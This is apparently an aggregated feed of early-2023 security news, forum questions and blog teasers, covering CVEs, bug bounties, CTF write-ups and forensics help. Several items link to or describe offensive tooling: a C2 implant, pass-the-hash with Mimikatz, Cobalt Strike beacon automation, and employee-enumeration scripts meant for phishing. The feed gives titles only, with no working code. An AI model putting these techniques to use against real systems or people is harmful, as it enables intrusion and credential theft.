• Open

    Some high resolution "adult" pictures
    Normal NSFW "Adult" pictures. This directory is separate from the normal "Wordpress" years sub directory structure (but they do have pictures in them also). Sorted by sets by numbered sub-directories. http://bestporngallery.com/wp-content/uploads/photo-gallery/Nubiles Porn/ submitted by /u/BustaKode [link] [comments]

  • Open

    Looks like Krishna-related PDFs
    As title says - Krishna-related PDFs https://ebooks.iskcondesiretree.com/pdf/ submitted by /u/BustaKode [link] [comments]
    Some Moon landing vids/pics. Nice vids of some interviews.
    Mainly Moon related pictures and videos. In the sub dir "Interviews", some quality interviews (If Trump triggers you, then avoid.) http://americasuncommonsense.com/blog/wp-content/ submitted by /u/BustaKode [link] [comments]
  • Open

    In-House Platform Security Concerns
    I work for a Fortune 500 company and we recently developed and deployed an in-house platform that is solely used by employees and employees only. The platform is used every single day across the country by field specialists (on their iPads). Curious to know what kind of security risks we should look out for…if any? Yes, there is sensitive customer data stored on this platform that is accessible by the field team, corporate account team, and the IT team. submitted by /u/Limp_Help8388 [link] [comments]
    Wappalyzer Firefox plugin stores private browsing cookies. Thoughts?
    Today I noticed that a large amount of sites I opened in Private Browsing had a large amount of cookie data stored, even after I closed Firefox, under the "Cookies and Site Data" setting. I started looking into it by performing the following tests:
    - Cleared all the unwanted cookies from Firefox and opened a private browsing window with all my addons enabled.
    - Visited a bunch of random sites, closed private browsing, and the cookies remained there.
    - Cleared the cookies again and closed Firefox.
    - This time I disabled all of my addons.
    - Did the same test with the websites and none appeared on Cookies and Site Data. Interesting.
    - I started enabling the plugins one by one and performed the same site test each time I enabled a plugin.
    - The time I enabled Wappalyzer I noticed that cookie data remained stored.
    What are your thoughts on this? submitted by /u/Voyaller [link] [comments]
    Weighting Matrix, how to set weights?
    Hi all 👋 I have a questionnaire assessing equipment in terms of cyber resilience. Closed-ended questions have been approved and now I need to add weights to each question to create the weighting matrix. My question is that I feel all questions are very critical and I feel like they are all worth maximum weight, so how will I assign the weights? r/CyberResilience submitted by /u/---Agent47--- [link] [comments]
    Weird Bluetooth - Should I be concerned?
    Forgive me for any faux pas I may commit, I am a long-time lurker, first-time poster. I wanted to get some feedback from you all. There is a weird device that consistently shows up in all my Bluetooth devices (phone, iPads, etc). We live in a house not particularly close to any neighbors, which is why I think this has to be something in my own home. Normally I wouldn't be super concerned, but the name clearly implies something more "adult" than we would have here. It's named USMEM_L_USTHOLE and that's why I'm concerned. I've tried Wunderfind and other apps but they won't let me find the source unless I am connected to it. I've also tried connecting to it, but it's never successful. Please tell me if I should be concerned about this - I keep thinking that if it's on Bluetooth it has to be something very close and that is what worries me. Thank you so much for your insights!!!! submitted by /u/FuzzyCow-1103 [link] [comments]
  • Open

    Small utility to chunk up a large BloodHound JSON file into smaller files for faster importing.
    submitted by /u/ustayready [link] [comments]
    mast1c0re: Part 3 – Escaping the PS5 emulator
    submitted by /u/ArbitraryWrite [link] [comments]
    Azure B2C Crypto Misuse and Account Compromise
    submitted by /u/dlorenc [link] [comments]
    chvancooten/NimPlant: A light-weight first-stage C2 implant written in Nim.
    submitted by /u/Vegetable_Treat_5017 [link] [comments]
  • Open

    Using OSINT for Free WIFI
    Check it out! I quickly go over an OSINT online tool you can use to find a record of a bunch of WIFI networks near you! https://youtu.be/jHFcP1ItJgE submitted by /u/cyberducky0_0 [link] [comments]
  • Open

    Fix timing oracle in RSA decryption (CVE-2022-4304)
    Article URL: https://github.com/openssl/openssl/commit/b1892d21f8f0435deb0250f24a97915dc641c807 Comments URL: https://news.ycombinator.com/item?id=34851608 Points: 1 # Comments: 0
  • Open

    OhSINT Write-Up, TryHackMe
    For my first write-up, I decided to do a write-up of the OhSINT machine on TryHackMe. I apologize for any mistake I come to make in… Continue reading on Medium »
  • Open

    Privileges Escalation Techniques (Basic to Advanced) in Linux
    Part-5 Continue reading on Medium »
  • Open

    SecWiki News 2023-02-18 Review
    No news updates yet today. For more of the latest articles, visit SecWiki.
  • Open

    Hacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on Bing.com
    XSS on Bing.com Continue reading on Medium »
    Out-of-bounds Read — [CWE-125]
    Continue reading on Medium »
    Hack Any Computer System just with your Android Device.
    Hello learners, I hope you all are doing well. As you all know, today we are going to hack a computer system using our Android… Continue reading on System Weakness »
    Found a URL in the Android application source code which led to an IDOR
    I was testing the target which had its web application and mobile application in scope. Let’s say the target is example.com Continue reading on Medium »
    Out-of-bounds Write-[787]
    Continue reading on Medium »
    Bug Zero at a Glance [Week 11–17 February]
    What happened with Bug Zero? Continue reading on Bug Zero »
  • Open

    How to Create Disk Image / Mount Drive Read-Only?
    submitted by /u/IllCow9235 [link] [comments]
    How to Recover Older Windows Passwords?
    submitted by /u/IllCow9235 [link] [comments]
  • Open

    Casino Download X
    When you go online to find new games, there is no shortage of results, quite the opposite. There are so many sites and games that it can… Continue reading on Medium »

  • Open

    Lots of DOOM related stuff - Decent amount of Music - bunch of random crap
    submitted by /u/mingaminga [link] [comments]
  • Open

    Confessions of a bug bounty program manager
    In my previous article I wrote about my experiences as a top ranked bug bounty hunter. Continue reading on Medium »
    How I hack the most popular social media in 2022 (broken access control)
    by Maxime Jourdan Continue reading on Medium »
    Introduction to SSRF Exploitation: A Practical Tutorial for Ethical Hackers — StackZero
    Introduction to SSRF covering its mechanics, techniques, and effective countermeasures to defend against such attacks. Continue reading on InfoSec Write-ups »
    AWS Lambda script to delete Inactive Users
    I was doing some learning within AWS and playing around with AWS Lambda functions. This particular Lambda function utilizes the boto3 library to… Continue reading on Bug Bounty Hunting »
    $$$$ IDOR’s — How to find IDORs in Ecommerce sites?
    Introduction: Continue reading on Medium »
    Stealing in motion. Immunefi bounty hunting from different ANGLE.
    When starting the mentorship program with @trust__90, the first task I was given was to do security research of Angle Protocol — “a… Continue reading on Medium »
    Join CryptoRank Bug Bounty Campaign!
    Attention all security researchers and crypto enthusiasts! We’re excited to announce that we’re launching a bug bounty campaign on… Continue reading on Medium »
    How to Participate in a Bug Bounty Program
    Bug bounty programs have become increasingly popular in recent years as a way for companies to uncover vulnerabilities in their software… Continue reading on Medium »
  • Open

    Can a company that owns a web browser see the unencrypted HTTPS data when you visit a website?
    Can a company that owns a web browser see the unencrypted HTTPS data when you visit a website? submitted by /u/Bored-Giraffe [link] [comments]
    Help - Network hacked
    Network has been hacked along with remote access to other devices on the network. Symptoms: FPS and ping lag, changes to pixels on screen and other devices, remote control of desktop PC. Have previously performed a fresh install of Windows. Have a UniFi router, switch and AP but suffered a network outage today (am sure this was an attack), so I have now removed devices off the network and gone back to the ISP-provided router/modem. Planning to wipe drives using secure boot and reimage network devices (router, switch and AP). Then set up network security/firewall again and a segregated network for other devices in the house. I'll be honest, I'm a bit out of my depth here, so I've come for help. submitted by /u/Miserable-Apricot-99 [link] [comments]
    any valid chip software??
    emv chip software submitted by /u/Balenciaga_- [link] [comments]
    need help disabling microsoft-edge-policies automatichttpsdefault
    YES, YES, YES, I KNOW HTTPS IS BETTER AND PREFERRED, however we have no control over these legacy apps that our end users use. So we have multiple sites that have various internal-only web servers that are still running HTTP instead of HTTPS. Some are vendor-provided web servers, others are internally created legacy applications.
    We noticed an issue across all browsers (Edge, Chrome, Firefox) that all sites are being redirected to HTTPS URLs. End users are unable to access the sites by URL: after typing in http://exampleserver1.site.com it then redirects to https://exampleserver1.site.com. If they use the server IP address http://123.123.123.123 then the web app works. The internal sites work if we roll back to prior versions of Edge, Chrome, Firefox.
    We've tried testing disabling the "HTTPS-Only Mode" in Firefox, but users are still getting the same issue of the sites redirecting to HTTPS. https://support.mozilla.org/en-US/kb/https-only-prefs?as=u&utm_source=inproduct We've also tried adding the registry key for Edge, but once again we are still having the same error. https://learn.microsoft.com/en-us/deployedge/microsoft-edge-policies#automatichttpsdefault
    YES, YES, YES, I KNOW HTTPS IS BETTER AND PREFERRED, however we have no control over these legacy apps that our end users use. When looking at our Edge STIG we don't see any of the settings Microsoft referenced in the above article in the most recent Edge STIG on https://www.stigviewer.com/stig/microsoft_edge/
    YES, YES, YES, I KNOW HTTPS IS BETTER AND PREFERRED, however we have no control over these legacy apps that our end users use. Just wondering if anyone has run across this and, if so, was there an additional registry or browser setting you had to set to bypass the auto-HTTPS setting. submitted by /u/Jeeps_guns_bbq [link] [comments]
    Thoughts on the new Black Hat Certified Pentester (BCPen)?
    https://secops.group/blackhat-certified-pentester-bcpen/ I saw this yesterday when I got the Black Hat 2023 registration information. It looks interesting, but I'm curious what others think of it since it reads as a new offering with a high level of expectations without any class/training ahead of the exam. I'd like to get a pentest cert though it's not my only focus (I'm a sole analyst and mostly focused on blue) and I don't want to blow 2k on a test that I may not be fully prepared for. submitted by /u/EnterNam0 [link] [comments]
    Snort, on Windows 2019 server, receiving an error due to it trying to create a directory with an IPv6 (containing colons). How do I rectify this?
    I'm starting Snort with the following command: snort -i 4 -A console -c C:\snort\etc\snort.conf -l C:\Snort\log -K ascii But I am receiving an error on this line: Commencing packet processing (pid=16632) 02/15-09:46:36.450939 [**] [129:12:1] Consecutive TCP small segments exceeding threshold [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} ab12:0000:0000:0000:789a:0a64:acab:8440:63332 -> ab12:0000:0000:0000:789a:0a64:acab:8440:5432 ERROR: OpenLogFile() => mkdir(C:\Snort\log/ab12:0000:0000:0000:789a:0a64:acab:8440) log directory: Invalid argument Fatal Error, Quitting.. I have found two links that say it's due to the colon in the potential directory name, but have not found anything that says what to do about it. EDIT: I think I just figured it out... after 2 days of looking, I realized that the "-i 4" was based on a different server and on this server it should be "-i 1" for "Ethernet adapter Public" submitted by /u/PCI_Questions [link] [comments]
    Can and do Google employees look at your chrome HTTPS data in its unencrypted form?
    Can and do Google employees look at your chrome HTTPS data in its unencrypted form? submitted by /u/Bored-Giraffe [link] [comments]
  • Open

    Bypass invite accept for victim
    Slack disclosed a bug submitted by analyz3r: https://hackerone.com/reports/1663361 - Bounty: $1500
    View thumbnail of any private video (friends or followers only) of Private/Public account
    TikTok disclosed a bug submitted by amans: https://hackerone.com/reports/1498353 - Bounty: $500
    Multiple OpenSSL error handling issues in nodejs crypto library
    Node.js disclosed a bug submitted by mjones-vsat: https://hackerone.com/reports/1808596
  • Open

    Is there a way to create a Cobalt Strike beacon with Python?
    I am working on this automation project and I am seeking a way to create a Cobalt Strike beacon through a Python script. I am trying to minimize the amount of user intervention involved in the process; I don't want to interact with the GUI for it. submitted by /u/baronobeefdip2 [link] [comments]
    SSH Tunneling Shenanigans
    In this week's red team tip, I show examples of how to port RDP through an SSH tunnel. I also show SSH control sequences, a way to do this you may not have seen before. SSH Tunneling Shenanigans submitted by /u/Infosecsamurai [link] [comments]
    What exploit testing tools do you use to figure out what the vulnerabilities are?
    I understand that people use exploit databases like exploit-db but what tools do you use to detect what the exploits are without breaking the system? submitted by /u/Conchoidally [link] [comments]
    WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks
    submitted by /u/dmchell [link] [comments]
    Check out this cool attack tool developed in PowerShell for testing Azure AD and Microsoft 365 security.
    submitted by /u/openrecon [link] [comments]
  • Open

    Fuzzing integration enables security testing in Jest
    Article URL: https://twitter.com/KhaledYakdan/status/1626220906606477313 Comments URL: https://news.ycombinator.com/item?id=34836425 Points: 2 # Comments: 0
    Curl Audit: How a Joke Led to Significant Findings: – Fuzzing Weekly CW7
    Article URL: https://old.reddit.com/r/fuzzing/comments/114gbdl/curl_audit_how_a_joke_led_to_significant_findings/ Comments URL: https://news.ycombinator.com/item?id=34832956 Points: 2 # Comments: 0
  • Open

    SecWiki News 2023-02-17 Review
    Overview of the Global Defense Cyberspace Situation in 2022 (Cyber Force Building, Part 2) by ourren; Overview of the Global Defense Cyberspace Situation in 2022 (Cyber Force Building, Part 1) by ourren; A Survey of Network Traffic Anomaly Detection by ourren. For more of the latest articles, visit SecWiki.
  • Open

    How we Hacked Apple Twice in one day for Fun (and Profit)
    submitted by /u/pectoral [link] [comments]
    Ghidra Golf: A Reverse Engineering CTF
    submitted by /u/DLLCoolJ [link] [comments]
    Introducing Proxy Enriched Sequence Diagrams (PESD). New Burp Plugin.
    submitted by /u/nibblesec [link] [comments]
    Reinforcement learning for red/blue team automation
    submitted by /u/limmen [link] [comments]
    CVE-2023-20032: ClamAV Remote Code Execution (CVSS 9.8)
    submitted by /u/qwerty0x41 [link] [comments]
  • Open

    Daily Blog
    Is there a daily DFIR blog you read? What about your favorite cybersecurity blog that maybe you don't read every day, but you find to be very educational? What do you guys think of the Internet Storm Center blog? Cheers! submitted by /u/DeadBirdRugby [link] [comments]
    Spotlight Inspector download?
    I'm aware this seemingly marvelous tool was acquired by Blackbag Technologies: 504ENSICS Labs announced a tool, Spotlight Inspector, that parsed the Spotlight metadata store database (store.db) offline, on several examination systems. This was the first record of the database being successfully reverse engineered. However, a note on the 504ENSICS website states that the Spotlight Inspector intellectual property has been acquired by Blackbag Technologies, Inc. As such, 504ENSICS Labs no longer offers direct free downloads of the tool. Today, this tool is no longer available nor was their methodology, results or analysis of the database structure published or made publicly available. It is unknown if the tool was able to recover deleted records or parse the content for these records. I'm sure someone downloaded it and might still have it around. Though Spotlight may have changed over the years, as recently as 2019, it appears the tool still worked. Does anyone have a copy they are willing to share? 🥺 ::EDIT:: Yes, I have used Spotlight Parser, and it's not bad. But hoping to give something else a try. submitted by /u/GuidoZ [link] [comments]
  • Open

    cURL Audit: How a Joke Led to Significant Findings: — Fuzzing Weekly CW7
    cURL Audit: How a Joke Led to Significant Findings… Continue reading on Medium »
  • Open

    FreeBuf Weekly | Hackers are still exploiting patched Exchange vulnerabilities; PyPI Python packages contain malicious code
    This article summarizes and recommends the week's hot news, security incidents, good reads and handy tools, so you don't miss any of this week's highlights!
    Worth watching: attackers are still exploiting patched Exchange vulnerabilities
    Attackers exploit the ProxyShell vulnerabilities, tracked as CVE-2021-34473 and CVE-2021-34523, to gain initial access to target networks.
    Lab notes - HTB Soccer
    Hack The Box hands-on lab, the Soccer machine, rated Easy by HTB. Topics covered: file upload vulnerability, SQL injection via a websocket interface, SUID privilege escalation, etc.
    A new take on honeypots: unparalleled insight, unique threat intelligence
    There are countless honeypots in China; I want to discuss some different honeypot products and draw more attention to this segment of the honeypot market.
    New Mirai malware variant infects Linux devices to build a DDoS botnet
    Security researchers note that the new variant, "V3G4", is most likely selling DDoS services to customers who want to launch attacks against specific websites or online services.
    (ISC)2: amid the global economic downturn, cybersecurity positions are the least affected
    Only 10% of executives expect to lay off members of their cybersecurity team in 2023, a proportion far lower than in other industries.
    FB Book Giveaway No. 95 | The reverse engineering classic 《Ghidra权威指南》 (The Ghidra Book) is waiting for you!
    Knowledge about Ghidra in China is scattered and not conducive to systematic study, but don't worry: 《Ghidra权威指南》 can help you.
    Dark-side AI: "injecting" malice into ChatGPT
    What happens when malice is "injected" into ChatGPT? A unique perspective on ChatGPT's potential risks, presented in detail in the latest assessment from the AsiaInfo Security Cybersecurity Research Institute.
  • Open

    Show HN: Archer – open-source distributed network and vulnerability scanner
    Article URL: https://github.com/taythebot/archer Comments URL: https://news.ycombinator.com/item?id=34831499 Points: 2 # Comments: 0
  • Open

    Citrix CVE-2022-27518 Vulnerability Analysis
    Author: hanwang @ Knownsec 404 Lab (知道创宇404实验室) Date: 17 February 2023 Vulnerability overview: In December 2022 Citrix published an advisory for CVE-2022-27518, a remote code execution vulnerability with a CVSS score of 9.8. More than two months have passed, and because setting up the vulnerable environment is fairly complex, no analysis article has appeared. After a period of diff analysis and verification, the root cause was found to be that when Citrix NetScaler parses SAML XML, the SignatureV...
  • Open

    WhatsApp crash codes?
    Hi, I just read about WhatsApp crash codes. Is this still a thing in 2023? submitted by /u/liquid_nitr0gen [link] [comments]

  • Open

    What are the countries with the best paid/best quality entry-level cybersecurity jobs?
    Hello everyone! I'm at a point in life where I have total flexibility to go whatever direction I want, so I was wondering what are the best countries to start a cybersecurity career. I'm a European Union citizen, quite new to cybersecurity (and by no means a seasoned expert), but I also have a few years' experience in other types of positions in tech companies, so not really a totally inexperienced worker either. My main priorities are a good salary and also (even if it's later down the road) the possibility to work mostly remote and with flexible schedules. I have a preference for being based in Europe but I'm flexible with that too. Single with no kids and no kind of debt, so no constraints on that side either. What are the salaries and job conditions like where you live and what would you say are the best places to start a career? What could be the potential salaries for someone like me? Info about me:
    - A BSc in engineering
    - An MSc in cybersecurity
    - A 6-month internship in a mid-size cybersecurity consultancy firm (mostly pentesting)
    - 4 years' experience in another tech company (one of the big ones), not related to cybersecurity (most of this time I was managing a tech support team but my job was not really technical)
    - I speak 3 languages, including fluent English and Spanish.
    - Tons of international experience, studied/worked in different countries for long periods of time.
    Thanks everyone for the help! submitted by /u/BroX111 [link] [comments]
    Best fuzzer for TCP-based JSON interface?
    There are so many options out there for network fuzzing, like Boofuzz, AFLNET, Scapy, etc. I would like to fuzz a local server application that exposes a TCP port that communicates mainly in JSON. Does anyone know what's the state-of-the-art approach for that? Generally, is there any resource out there comparing the myriad options available for network fuzzing that is relatively recent? submitted by /u/jafarlihi [link] [comments]
    How to pick a security framework to align to? NIST CSF/800-53, ISO 27001?
    So we complete SOC 2 audits annually along with a 3rd party security firm that audits us. I am working on finding a good GRC tool to help with things but also want to align with a framework and not sure how/which one to pick. submitted by /u/junkaccount1999 [link] [comments]
    Looking for guidance regarding cloud certs
    Hey everyone! I'm currently working as a netsec engineer and mainly deal with firewalls in my day-to-day business. I recently passed the OSCP because I want to get into pentesting at some point in the future. My employee asked me recently if I'm interested in cloud security, and since it's one of my weak points, I want to dedicate more time this year to learning and understanding how AWS/Azure/GCP work. This could benefit me in deploying firewalls for customers, understanding networking in cloud infrastructures, and also if I do find a job as a penetration tester. I'm really a potato when it comes to cloud and, apart from setting up a VM, I don't really have any knowledge. My guess is that I should focus on one cloud vendor and then I'll be able to at least find my way through the others? If so, which one would you recommend and why? My plan would then be to first take a beginner course/cert followed by one which focuses on security. Do you know which courses/certs could help me in achieving this? Thank you very much, any advice is appreciated. submitted by /u/ConzT [link] [comments]
    Risks of malware/spyware/keyloggers on Chinese devices - any mitigation possible?
    So I have been eyeing some small laptops/handhelds from Chinese vendors like GPD and Onemix, and now the Ayaneo 2. But I'm concerned about keyloggers, spyware, and other malware that could potentially be used to steal credentials being shipped with these devices. There are some articles about this topic that involve Huawei/Oppo/Xiaomi phones. I could probably remedy that by doing a fresh install of Windows and not installing any of the manufacturer utilities or drivers... But then, what are the chances that malware could persist between installs, perhaps at the firmware level, through abuse of the Windows Platform Binary Table, manufacturer drivers delivered via Windows Update, or some other method? submitted by /u/Secepatnya [link] [comments]
    Decentralized, Peer-To-Peer Encryption
    I do not have an IT background but enjoy computers and am a HUGE believer in protecting personal data and privacy against the government, corporations, basically anyone. I'm wondering if this exists and hope I explain this correctly. Is there such a thing as decentralized, peer-to-peer encryption for a chat app/instant messaging? Meaning no single server will hold or record what is being sent between users, as a true form of anonymous communication? Similar to Bitcoin, what if there was a cryptocurrency that rewarded miners for lending their processing power to randomly encrypt peer-to-peer messages? Instead of funneling the message data through a single node or computer, breaking the encrypted message into 3, 5, 7, 10 different packets that are routed through the network of computers used for "mining", then sent to the end user as the intended recipient? I believe something like this on top of a VPN and Tor would make it nearly impossible to track. Plus, if it was operating independently through decentralization, then nobody could log or backdoor the service. My issue is most of the services like WhatsApp or Signal log all your information and gladly hand it over as soon as the government comes knocking. Does something like this exist? Is it even possible to have a truly anonymous chat online anymore? submitted by /u/hfh7dc [link] [comments]
  • Open

    Outdated Default AWS IAM Policy Language Versions | CloudQuery
    submitted by /u/jsonpile [link] [comments]
    No More Access Denied - I Am the TrustedInstaller
    submitted by /u/achilles4828 [link] [comments]
    [BugTales] REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB
    submitted by /u/poltess0 [link] [comments]
    Secure Boot to Heads: A brief history of #Linux Boot Integrity
    submitted by /u/maltfield [link] [comments]
    Researcher infiltrates phishing syndicate to learn TTP's
    submitted by /u/CyberArkLabs [link] [comments]
  • Open

    Low authorization level at server side API operation e2e.updateGroupKey lets an attacker break the E2E architecture.
    Rocket.Chat disclosed a bug submitted by f0ns1: https://hackerone.com/reports/1757663
  • Open

    The barrier for skiddies is too damn low
    I present to you this lazy and unskilled individual with poor opsec, lolminerxmrig. Continue reading on Medium »
    OhSINT TryHackMe —A detailed writeup
    An OSINT challenge to figure out a password, SSID of a WAP, and more from just a photo. (Note: This is not a real-life example) Continue reading on Medium »
    Holy HIMARS! How a single Artillery system changed the tide of the UA war.
    We’re continuing our ongoing analysis of the current European conflict and the systems, people and decisions that have been able to… Continue reading on Medium »
    Hello
    Hello world! We are busy building the first human risk and continuous monitoring platform. If you are interested in being added to our… Continue reading on Medium »
  • Open

    OSINT: Enumerating Employees on LinkedIn and Xing
    Hi r/redteamsec, I've mangled with the unofficial LinkedIn and Xing APIs to retrieve employee information from company pages. Works well so far and may be helpful during red team assessments or phishing. I've also implemented a feature to automatically create a user's email address based on the dumped first name and last name. Just choose your preferred email layout via the CLI param and you're good to go. Docker images are readily available on Docker Hub. Note: Since users are free to define their name and we are not using the official APIs, the retrieved data can be bogus on some occasions, for example if users append their pronouns, a specific salutation or certificate abbreviations. The scripts filter out some stuff already, though. Here are the scripts on GitHub: https://github.com/l4rm4nd/LinkedInDumper https://github.com/l4rm4nd/XingDumper Use responsibly. Cheers! submitted by /u/sk1nT7 [link] [comments]
  • Open

    FAT32 drive
    I'm looking at a USB in FTK Imager which was formatted in FAT32. There's a folder with a bunch of deleted files that all show an identical date modified timestamp. Would this point to the possible mass deletion time? submitted by /u/internal_logging [link] [comments]
  • Open

    Linux vs Windows exploit Dev
    Hi everyone, I was thinking about possibly taking the OSED https://www.offensive-security.com/courses/exp-301/ for Windows exploit dev. However, since I'm much more familiar with Linux these days, I was wondering what the pros and cons are of doing exploit dev work on each platform. To start off with, I believe I need to narrow my focus and then branch out. Any advice would be greatly appreciated, thanks. submitted by /u/_W0z [link] [comments]
    Do you know any gnu/linux security researcher's blogs?
    I'm looking for blogs where I can read write-ups on how to find and exploit vulnerabilities in real-world C programs, not CTFs. submitted by /u/wlo1337 [link] [comments]
  • Open

    DHS warns iPhone users to change settings over zero-day vulnerability
    Article URL: https://www.theepochtimes.com/federal-agency-warns-millions-of-iphone-users-to-change-settings-now_5059459.html Comments URL: https://news.ycombinator.com/item?id=34820946 Points: 3 # Comments: 4
    Health info for 1M patients stolen using critical GoAnywhere vulnerability
    Article URL: https://arstechnica.com/information-technology/2023/02/goanywhere-vulnerability-exploit-used-to-steal-health-info-of-1-million-patients/ Comments URL: https://news.ycombinator.com/item?id=34818898 Points: 2 # Comments: 0
  • Open

    SecWiki News 2023-02-16 Review
    Exploring the firmware decompression of a certain T router by 路人甲; Java deserialization prerequisites in full by 路人甲. For more of the latest articles, visit SecWiki.
  • Open

    Simplify Your Web Application Testing with These Python Snippets
    In this blog post, I’ll share some helpful Python snippets that you can use to streamline your testing process and make your life easier… Continue reading on Medium »
    The Inside Story of Finding a Reverse Transaction Vulnerability in a Financial Application
    Hello everyone, my name is Raja Uzair Abdullah and I’m an Application Security Engineer. With my focus on penetration testing and bug… Continue reading on Medium »
    XSS on The MOST Popular Movie Ticket website.
    Hi all, Continue reading on Medium »
  • Open

    BOFs for Script Kiddies
    Introduction I hope I don’t sound like a complete n00b, but what or who or where is a BOF? All the cool kids are talking about it, and I just smile and nod. Is he the newest Crypto billionaire, or is a meetup for like-minded hackers, or is it some other 1337 slang? I understand... The post BOFs for Script Kiddies appeared first on TrustedSec.
  • Open

    HTB | Photobomb | Walkthrough
    No content preview
    Banking Trojan Analysis
    No content preview
    Have a safe flight (hacking the boarding pass)
    No content preview
    Top Paid Cybersecurity Affiliate Programs To Earn Passive Income
    In this article, we will see which are the top paid cyber security affiliate programs from which you can earn easy passive income and… Continue reading on InfoSec Write-ups »
    Bypass Jailbreak Detection in Flutter apps
    If you ever worked on a mobile Flutter application for a big company, or if you ever needed to treat your users’ personal data carefully… Continue reading on InfoSec Write-ups »
    TypoSquatting Malware Analysis
    No content preview
    The Dark Side of Social Media: Understanding and Protecting Yourself from Social Engineering…
    No content preview
    Securing the Cloud: Best Practices for Protecting Your Data in the Cloud
    No content preview
    A tale of a full Business Takeover — Red Team Diaries
    No content preview
    Reverse Engineering — An Overview
    No content preview
  • Open

    Information leakage channels and risk awareness; a discussion of data masking rules | FB Party A (in-house security) group topic discussion
    With large-scale information leaks, how can enterprises improve their awareness of data leakage risk? How can general data masking rules be formulated? How should a security assessment aimed at all company staff be conducted?
    FreeBuf Morning Report | Sweden's largest TV broadcaster paralyzed by attack; Lufthansa IT failure strands thousands of passengers
    According to reports on the 15th local time, an IT failure at German airline Lufthansa caused flight delays and disruptions across the group's airlines, stranding thousands of passengers worldwide.
    Google rolls out the Privacy Sandbox beta on Android 13 devices to better protect user privacy
    Google announced on Tuesday that it is officially rolling out the Android Privacy Sandbox beta to mobile devices running Android 13.
    CC3: another chain when CC1 does not work
    In CC1 and CC6, we ultimately popped the calculator by calling Runtime.exec; starting with CC3 we introduce a way to pop the calculator without going through Runtime, namely what Java commonly calls dynamic class loading.
    Hyundai and Kia vehicles hit by a logic flaw: a single USB cable is enough to drive the car away
    An estimated 3.8 million Hyundai and 4.5 million Kia vehicles are affected.
    Top ten cybersecurity development trends for 2023
    In 2023 the cybersecurity industry will place more emphasis on breakthroughs in core key technologies, use key industries to drive the growth of emerging network industries, promote the broad adoption of homegrown cybersecurity technology, and keep up its momentum of vigorous growth.
    Feel the magical power of Vue3
    Freed from writing declarative code, it is smooth to use and boosts efficiency considerably; it encapsulates reusable logic, separates UI from logic to improve reusability, makes view-layer code clearer, and removes much configuration, making it more convenient to use.
  • Open

    An archive of all the >2900 save files on WiiSave.com, which died 8 years ago, are now on Google Drive.
    submitted by /u/zuperfly [link] [comments]
    Biology diagrams, mostly of proteins
    https://www.proteinsynthesis.org/wp-content/uploads/2013/02/ submitted by /u/Glad-Line [link] [comments]
  • Open

    HACKING LAZYADMIN [TryHackMe] : CTF CHALLENGE
    Good to have you back, Hacker! For a little warm-up we are going to hack into an easy-level machine called LazyAdmin. At least, we get to… Continue reading on Medium »

  • Open

    Invoke-GMSAPasswordReader
    submitted by /u/v1brio [link] [comments]
  • Open

    Pass the Hash to Katz!
    Welcome weary web-travelers! This blog covers the basics of “Passing the Hash” using Mimikatz. This exercise was completed during my Cyber… Continue reading on Medium »
    AWSGoat(ine) AWS CTF solution Module 2
    Hi readers, here we will be solving AWSGoat Module 2 (https://github.com/ine-labs/AWSGoat) Continue reading on Medium »
    The Advantages of AI-Powered Cyber Security Tools
    As cyber threats continue to evolve and become more sophisticated, cyber security experts are turning to artificial intelligence (AI)… Continue reading on Medium »
  • Open

    ACE Exam Help
    Is there any possible way to access a full version of FTK to take this? I used my first try on just the imager and failed because many questions need the full version. submitted by /u/teemogangg [link] [comments]
    Databases in Axiom
    Does anyone analyse databases inside of Axiom? Is that even possible or am I missing something? I can find the .db by going through the File System option in Axiom, but after testing Belkasoft, viewing databases was smooth compared to Axiom. I've tested both tools with the same dataset and it was two different experiences. Tl;dr: Looking to hear your opinions when it comes to Axiom and databases. submitted by /u/agente_99 [link] [comments]
  • Open

    ClamAV 0.103.8, 0.105.2 and 1.0.1 patch versions published
    ClamAV 0.103.8, 0.105.2 and 1.0.1 patch versions published https://blog.clamav.net/2023/02/clamav-01038-01052-and-101-patch.html submitted by /u/Neustradamus [link] [comments]
    How to transition from SOC Analyst to SIEM Engineer?
    So I've been working as a SOC analyst for the last year or so with a MSSP. I've been enjoying it but working with the SIEM sounds really interesting. I think it would be cool to learn tuning and things like that. Problem is I have a ton of experience triaging and investigating alerts but zero experience administering the SIEM. Any ideas? Have any of you made that switch? submitted by /u/_thelinuxnoob_ [link] [comments]
    Was the Chinese balloon a memetic or cyber attack?
    Seems to me this event obscured many current event stories for this circus, essentially paralyzing the journalistic industry. Were there some cyber attacks starting while journalism was thus paralyzed? While our attention was artificially distracted. submitted by /u/transdimensionalmeme [link] [comments]
  • Open

    The Advancements in AI and Bug Hunting “A Look at OpenAI’s GPT-3 and Its Future Developments”
    Hey there! Welcome to the world of bug bounty hunting. As a bug bounty expert, let me share with you a story about my recent experience in… Continue reading on Medium »
    The Integration of OpenAI’s GPT-3 in Ethical Hacking and Penetration Testing
    Once upon a time, there was a hacker who was always on the lookout for new and innovative ways to break into systems. He had a reputation… Continue reading on Medium »
    The Power of Predictive Analysis “How OpenAI’s GPT-3 is Driving the Future of Bug Hunting”
    As a bug bounty expert, I have seen firsthand how the world of cybersecurity is constantly evolving. New threats arise every day, and as… Continue reading on Medium »
    The Possibilities and Risks of Using OpenAI’s GPT-3 in Mobile Application Bug Hunting
    Once upon a time, in the world of bug bounty hunting, a new player emerged — OpenAI’s GPT-3. The buzz around this language processing tool… Continue reading on Medium »
    Exploring the Use Cases of OpenAI’s GPT-3 in Web Application Bug Hunting
    Once upon a time, in a land far, far away, there was a group of hackers who wanted to test their skills and earn some extra cash. They… Continue reading on Medium »
    How OpenAI’s GPT-3 is Impacting the Career Paths of Bug Hunters
    Once upon a time, in the world of cybersecurity, a group of skilled bug hunters roamed the internet, hunting for vulnerabilities in… Continue reading on Medium »
    The Advantages and Limitations of Using OpenAI’s GPT-3 in Bug Hunting
    As a bug bounty expert, I’ve seen all kinds of techniques used to find vulnerabilities in software. But one of the most interesting… Continue reading on Medium »
    The Ethics of AI in Bug Hunting “Examining the Implications of OpenAI’s GPT-3”
    Bug hunting, also known as ethical hacking, has become a crucial part of modern cybersecurity. Continue reading on Medium »
    How OpenAI’s GPT-3 is Making Bug Hunting More Efficient and Accurate
    As a bug bounty expert, I’ve seen the industry evolve over the years with new technologies and tools being introduced every now and then… Continue reading on Medium »
